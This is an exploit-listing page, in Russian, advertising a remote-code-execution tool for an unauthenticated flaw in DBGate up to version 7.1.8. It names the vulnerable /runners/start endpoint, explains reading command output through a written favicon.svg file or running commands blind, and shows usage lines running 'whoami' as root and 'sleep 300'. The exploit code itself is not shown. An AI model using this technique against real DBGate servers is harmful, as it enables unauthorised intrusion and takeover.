## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-S-VX-CVE-2026-47668
## CVE-2026-47668
Неаутентифицированное RCE в DBGate <= 7.1.8
* REF1: https://github.com/dbgate/dbgate/security/advisories/GHSA-8v3q-9vmx-36vc
* REF2: https://github.com/Nxploited/CVE-2026-47668
**`rce.py`**
Минимальная реализация RCE на `/runners/start`,
**Привилегированный**
Если процесс может писать в папку `./public/`, для получения вывода команды используется файл `/favicon.svg`.
root@kitploit:~
$ rce.py whoami
root
Если нет, команда будет выполняться вслепую:
root@kitploit:~
./rce.py -b sleep 300
**`run.sh` / `shell.sh`**